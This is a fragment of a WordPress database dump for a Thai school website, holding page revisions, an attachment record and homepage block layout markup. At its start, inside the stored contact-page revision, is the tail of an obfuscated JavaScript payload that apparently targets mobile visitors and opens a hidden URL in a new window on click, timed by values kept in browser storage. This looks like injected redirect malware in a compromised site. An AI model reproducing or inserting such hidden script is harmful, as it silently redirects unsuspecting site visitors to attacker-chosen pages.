_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-06 22:04:24','2024-08-06 15:04:24','',362,'http://pakhaeng.ssk.in.th/?p=584',0,'revision','',0),
(585,1,'2024-08-07 09:18:11','2024-08-07 02:18:11','','สีฟ้า สีเขียว น่ารัก การ์ตูน ยินดีต้อนรับเปิดภาคเรียนใหม่ เปิดเทอม Canvas Banner','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%9f%e0%b9%89%e0%b8%b2-%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%a7-%e0%b8%99%e0%b9%88%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%81-%e0%b8%81%e0%b8%b2%e0%b8%a3-3','','','2024-08-07 09:18:11','2024-08-07 02:18:11','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png',0,'attachment','image/png',0),
(586,1,'2024-08-07 09:18:28','2024-08-07 02:18:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":585,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png\" alt=\"\" class=\"wp-image-585\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 